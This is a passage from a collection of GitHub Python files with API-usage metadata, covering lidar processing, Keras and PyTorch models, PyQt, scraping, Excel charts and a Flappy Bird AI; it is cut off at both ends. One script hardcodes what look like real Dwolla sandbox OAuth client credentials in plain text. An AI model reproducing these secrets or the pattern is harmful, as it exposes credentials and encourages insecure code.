None, 0, 1, cv2.NORM_MINMAX)\r\n hsv_0[..., 2] = 255 * hsv_0[..., 2] ** (1 / gamma)\r\n hsv_0 = np.uint8(hsv_0)\r\n image_flow_cut_0 = cv2.cvtColor(hsv_0, cv2.COLOR_HSV2RGB)\r\n\r\n return image_flow_cut, image_flow_cut_0, self.mag_read, mag_esti, self.direc_read, direc_esti\r\n\r\n\r\n\r\n\r\n", "repo_name": "Dongpeng-Ding/GTAV-Autonomy-", "sub_path": "Movement_check3.py", "file_name": "Movement_check3.py", "file_ext": "py", "file_size_in_byte": 28315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 101, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 101, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 102, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 103, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 107, "usage_type": "call"}, {"api_name": "Lidar_tools.edge_detect", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.indices", "line_number": 150, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 153, "usage_type": "call"}, {"api_name": "Lidar_tools.polar_to_cartesian", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 224, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 238, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 241, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 244, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 245, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 247, "usage_type": "call"}, {"api_name": "Lidar_tools.polar_to_cartesian", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 264, "usage_type": 
"call"}, {"api_name": "numpy.expand_dims", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 292, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 325, "usage_type": "call"}, {"api_name": "time.time", "line_number": 330, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 337, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 342, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 342, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 346, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 346, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 380, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 381, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 383, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 391, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 400, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 400, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 401, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 401, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 404, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 404, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 405, "usage_type": 
"call"}, {"api_name": "scipy.spatial.distance", "line_number": 405, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 408, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 408, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 409, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 430, "usage_type": "call"}, {"api_name": "time.time", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 462, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 472, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 473, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 474, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 484, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 485, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 516, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 532, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 534, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 541, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 543, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 544, "usage_type": 
"attribute"}, {"api_name": "numpy.zeros", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 549, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 549, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 551, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 552, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 552, "usage_type": "attribute"}]}
+{"seq_id": "12842844172", "text": "'''\nAuthor: Peter Chen\nAdapted from: https://docsv2.dwolla.com/#oauth\nPurpose: Creates a new refresh token and access token. \nPlease check the Readme for more details.\n'''\nimport requests\nimport json\nimport sys\n\ndef genToken():\n\tfrefresh = open('mysite/refresh_token.txt', 'r')\n\tinputtoken = frefresh.read()\n\turl = 'https://uat.dwolla.com/oauth/v2/token'\n\n\tpayload = {\n\t \"client_id\": \"KORB1uPLiCs2vO96B4Hiwxf8PsQ3Vk43I4k4oopegs5HjrmkLd\",\n\t \"client_secret\": \"6919gTg6EcX1EK2YulRvDgWeDuMTvIFUt3krwux52e4REeP7Mq\",\n\t \"refresh_token\": inputtoken,\n\t \"grant_type\": \"refresh_token\"\n\t}\n\n\tnew_tok = requests.post(url, data=payload)\n\tparsed_json = json.loads(new_tok.text)\n\tnewRefresh = parsed_json['refresh_token']\n\tnewAccess = parsed_json['access_token']\n\n\tfrefresh = open('mysite/refresh_token.txt', 'w+')\n\tfaccess = open('mysite/access_token.txt', 'w+')\n\tfaccess.write(newAccess)\n\tfrefresh.write(newRefresh)\n\treturn newAccess\n\n\n", "repo_name": "nestegg333/backend", "sub_path": "mysite/mysite/genauthtoken.py", "file_name": "genauthtoken.py", "file_ext": "py", "file_size_in_byte": 925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "17517859737", "text": "#Author: Eduardo Santos Carlos de Souza\n\n#Usage:\n#argv[1] = basis vgg16 network\n#argv[2] = new fc2 size\n#argv[3] = .npy file of train dataset for predictions size\n#argv[4] = filename to store the generated Model\n\nfrom keras.layers import Dense\nfrom keras.models import Model, load_model\nimport numpy as np\nimport sys\n\n\n#Variaveis de entrada e saida da rede\nvgg16_imgnet = load_model(sys.argv[1])\nfc2_size = int(sys.argv[2])\narr = np.load(sys.argv[3])\nn_classes = arr['arr_1'].shape[1]\narr.close()\nfilename = sys.argv[4]\n\nprint(\"Network: \" + sys.argv[1])\nprint(\"FC2 Size: \" + str(fc2_size))\nprint(\"# of classes: \" + str(n_classes))\nprint(\"Output Network: \" + filename)\n\nfor layer in vgg16_imgnet.layers:\n\tlayer.trainable = False\n\nnew_tensor = Dense(fc2_size, activation='relu', name='fc2')(vgg16_imgnet.get_layer(name='fc1').output)\nnew_tensor = Dense(n_classes, activation='softmax', name='predictions')(new_tensor)\n\n#Gerar modelo\nnew_vgg16 = Model(vgg16_imgnet.input, new_tensor)\nnew_vgg16.compile(loss='mean_squared_error', optimizer='sgd', metrics=['accuracy'])\nnew_vgg16.summary()\n\n#Salvar modelo\nnew_vgg16.save(filename)", "repo_name": "eduardoscsouza/Pre-Trained-CNN", "sub_path": "generatecnn.py", "file_name": "generatecnn.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.load_model", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "72326180007", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport sip\n\nfrom PyQt5.QtWidgets import QWidget, QComboBox, QVBoxLayout, QLabel, QApplication\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n# sip.setapi('QString', 2)\n# sip.setapi('QVariant', 2)\n\n\nclass ImageChanger(QWidget):\n def __init__(self, images, parent=None):\n super(ImageChanger, self).__init__(parent)\n\n self.comboBox = QComboBox(self)\n self.comboBox.addItems(images)\n\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(self.comboBox)\n\nclass MyWindow(QWidget):\n def __init__(self, images, parent=None):\n super(MyWindow, self).__init__(parent)\n self.label = QLabel(self)\n self.imageChanger = ImageChanger(images)\n self.imageChanger.move(self.imageChanger.pos().y(), self.imageChanger.pos().x() + 100)\n self.imageChanger.show()\n self.imageChanger.comboBox.currentIndexChanged[str].connect(self.changeImage)\n self.layout = QVBoxLayout(self)\n\n @pyqtSlot(str)\n def changeImage(self, pathToImage):\n pixmap = QPixmap(pathToImage)\n\n\nif __name__ == \"__main__\":\n import sys\n\n images = [ \"left.png\",\n \"right.png\",\n \"Temmie.png\",\n ]\n\n app = QApplication(sys.argv)\n app.setApplicationName('MyWindow')\n\n main = MyWindow(images)\n main.show()\n\n sys.exit(app.exec_())", "repo_name": "JangTry/raiseMe", "sub_path": "imagechangeEx.py", "file_name": "imagechangeEx.py", "file_ext": "py", "file_size_in_byte": 1388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QComboBox", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "20399293519", "text": "# coding=UTF-8\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pickle\n\n\npages = set()\ndef getLinks(pageUrl):\n global pages\n html = urlopen(\"http://www.tianqihoubao.com\"+pageUrl)\n bsObj = BeautifulSoup(html, \"lxml\")\n\n for link in bsObj.findAll(\"a\", href=re.compile(\"^(/aqi/)[a-zA-Z]+(-)?[0-9]*(\\.html)\")):\n if 'href' in link.attrs:\n if link.attrs['href'] not in pages:\n #We have encountered a new page\n newPage = link.attrs['href']\n print(newPage)\n pages.add(newPage)\n getLinks(newPage)\n\n\ngetLinks(\"/aqi/\")\nF = open('E:/docs/pages.pkl', 'wb')\npickle.dump(pages, F)\n\n\n\n", "repo_name": "plutoese/db-analysis", "sub_path": "application/webscraper/demo_first_ws.py", "file_name": "demo_first_ws.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.urlopen", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "25606272722", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import minmax_scale\n#from sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nimport pickle\n#from sklearn.externals import joblib\nimport joblib\n\nimport warnings\n\ndef clf_fnc(arr):\n\n warnings.filterwarnings('ignore')\n\n try:\n clf = joblib.load('filename.pkl')\n except:\n dataset = pd.read_csv('Training Dataset.csv')\n # dataset 분리\n X = dataset.iloc[:, 0:29]\n Y = dataset.iloc[:, 29:]\n train_scaled = minmax_scale(X, axis = 0)\n ncol = train_scaled.shape[1] # 29\n\n (X_train, X_test, y_train_labels, y_test_labels) = train_test_split(train_scaled, \n Y, test_size=0.3, random_state=np.random.seed(172))\n\n clf = RandomForestClassifier(max_depth=30, criterion='gini')\n clf.fit(X_train, y_train_labels)\n saved_model = pickle.dumps(clf)\n joblib.dump(clf, 'filename.pkl') \n #------ modle save code\n\n a=np.array(arr).reshape(1,29)\n\n result = clf.predict(a)\n print(result)\n #----- predict result from load model\n return result\n", "repo_name": "melpin/capstone_design_project_1", "sub_path": "clf.py", "file_name": "clf.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.minmax_scale", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 31, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "22027553207", "text": "import pygame as pg\nimport nn\nimport numpy as np\nimport constants as cn\nfrom random import randint\n\nclass Bird:\n def __init__(self, weights=None, ai=None):\n self.x = 60\n self.y = randint(10,cn.HEIGHT-10)\n self.speed = 4\n self.ai = ai\n self.rect = pg.Rect(self.x,self.y,cn.B_WIDTH, cn.B_HEIGHT)\n self.dead = False\n if not weights:\n self.net = nn.Network()\n else: self.net = nn.Network(weights)\n self.fitness = 0\n\n def update(self, pipe):\n self.image = pg.image.load('assets/0.png')\n out = self.net.feedforward([(self.rect.x - pipe.pipe_up.x), (self.rect.y - pipe.pipe_down.y)])\n if out > 0.5:\n self.jump()\n self.move()\n\n def move(self):\n # checking if jumped recently if so decrease velocity until its default again\n if self.speed < 4:\n self.speed += 1\n self.image = pg.image.load('assets/1.png')\n else: self.image = pg.image.load('assets/0.png')\n self.rect.move_ip(0,self.speed)\n\n def jump(self):\n self.speed = -12\n self.fitness -= 3\n\n def draw(self, screen):\n screen.blit(self.image.convert_alpha(),self.rect)\n\n\n\n", "repo_name": "huddy14/flappybird-ai-nn", "sub_path": "bird.py", "file_name": "bird.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "constants.HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 13, "usage_type": "call"}, {"api_name": "constants.B_WIDTH", "line_number": 13, "usage_type": "attribute"}, {"api_name": "constants.B_HEIGHT", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nn.Network", "line_number": 16, "usage_type": "call"}, {"api_name": "nn.Network", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "3917639273", "text": "import pprint\nimport xlsxwriter\n\n\ntotalParticles = {}\nparticlesValues = []\nmegaPartsValues = []\n\nmaxRow = 0\n##############\n# Parse Data\n##############\nwith open('particlePerformance.txt') as fp:\n\tfor line in fp:\n\t\tparsed = [float(x.strip()) for x in line.split('\\t')]\n\t\tnumParticles = parsed[0]\n\t\tmegaPartsPerSec = parsed[1]\n\n\t\tif numParticles not in particlesValues:\n\t\t\tparticlesValues.append(numParticles)\n\t\tif megaPartsPerSec not in megaPartsValues:\n\t\t\tmegaPartsValues.append(megaPartsPerSec)\n\n\t\tif numParticles not in totalParticles:\n\t\t\ttotalParticles[numParticles] = []\n\t\ttotalParticles[numParticles].append(megaPartsPerSec)\n\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(totalParticles)\n\n\nworkbook = xlsxwriter.Workbook('results.xlsx')\nworksheet = workbook.add_worksheet()\nbold_cell_format = workbook.add_format()\nbold_cell_format.set_bold()\n############# writing table to excel #############\ncol = 1\navg = 0\nprint(\"------ Averages -----\")\nfor numParts, values in totalParticles.items():\n\tworksheet.write(0, col, numParts, bold_cell_format)\n\trow = 1\n\tfor megaPartPer in values:\n\t\tavg += megaPartPer\n\t\tworksheet.write(row, col, megaPartPer)\n\t\trow += 1\n\tprint(str(numParts) + \": \\t\" + str( int(avg/ len(values)) ) )\n\tcol += 1\n\tif maxRow < row:\n\t\tmaxRow = row\n\n############# Graph building #############\n##############################################\n# LINE GRAPH MegaParticlesPerSec v. Total Num Particles\n# \tValues = Y axis\t Categories = X axis\n#\tValues = MegaParticles Categories = Num Particles\n##############################################\n\nchart1 = workbook.add_chart({'type': 'bar'})\ncol = 1\nstartRow = 1\nlastRow = maxRow\nfor i in particlesValues:\n\t# [sheetname, first_row, first_col, last_row, last_col]\n\tchart1.add_series({\n\t\t'name': \"Particles: \" + str(i),\n 'values': ['Sheet1', startRow, col, lastRow, col],\n 'categories': ['Sheet1', 0, col, 0, col]\n })\n\tcol += 1\n\n\n# Configure the chart axes.\nchart1.set_x_axis({\n\t'name': 'Total Number of Particles',\n})\nchart1.set_y_axis({\n\t'name': 'MegaParticles Per Second',\n})\n\ncurrentInsertDepth = 1\ninsert = str(chr(65 + len(particlesValues) + 1)) + str(currentInsertDepth)\n# Insert the chart into the worksheet.\nworksheet.insert_chart(insert, chart1)\n", "repo_name": "fischjer4/Parallel-Programming", "sub_path": "Project-7/generateExelData.py", "file_name": "generateExelData.py", "file_ext": "py", "file_size_in_byte": 2229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 28, "usage_type": "call"}, {"api_name": "xlsxwriter.Workbook", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "14890891819", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ResidualBlock(nn.Module):\n \"\"\"残差块结构\n \"\"\"\n def __init__(self, input_channels, output_channels, conv_x1=False, strides=1):\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(input_channels, output_channels, kernel_size=3, padding=1, stride=strides),\n nn.BatchNorm2d(output_channels),\n nn.LeakyReLU(0.1)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(output_channels, output_channels, kernel_size=3, padding=1, stride=strides),\n nn.BatchNorm2d(output_channels),\n )\n if conv_x1:\n self.conv3 = nn.Conv2d(input_channels, output_channels, kernel_size=3, padding=1)\n else:\n self.conv3 = None\n\n def forward(self, x):\n # 第一次卷积\n out = self.conv1(x)\n # 第二次卷积\n out = self.conv2(out)\n\n if self.conv3:\n x = self.conv3(x)\n\n out = F.leaky_relu_(x + out, 0.1)\n return out\n\n\nclass FanNet(nn.Module):\n \"\"\"基于残差块的卷积神经网络 run\n \"\"\"\n def __init__(self):\n super(FanNet, self).__init__()\n\n # 卷积层1 input 1x28x28 output 16x12x12\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=5),\n nn.BatchNorm2d(16, affine=True),\n nn.LeakyReLU(0.1),\n nn.MaxPool2d(kernel_size=2),\n )\n # 卷积层2 input 16x12x12 output 32x4x4\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=5),\n # nn.BatchNorm2d(32, affine=True),\n nn.LeakyReLU(0.1),\n nn.MaxPool2d(kernel_size=2),\n )\n\n # 全连接层\n self.fc1 = nn.Linear(32 * 4 * 4, 84)\n self.fc2 = nn.Linear(84, 10)\n\n self.dropout = nn.Dropout(0.25)\n\n # 前向传播\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n\n # flatten层\n x = x.view(x.size(0), -1)\n\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout(x)\n out = self.fc2(x)\n\n return out\n", "repo_name": "lqz72/MNIST-classifier", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 2223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.leaky_relu_", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "name"}, {"api_name": 
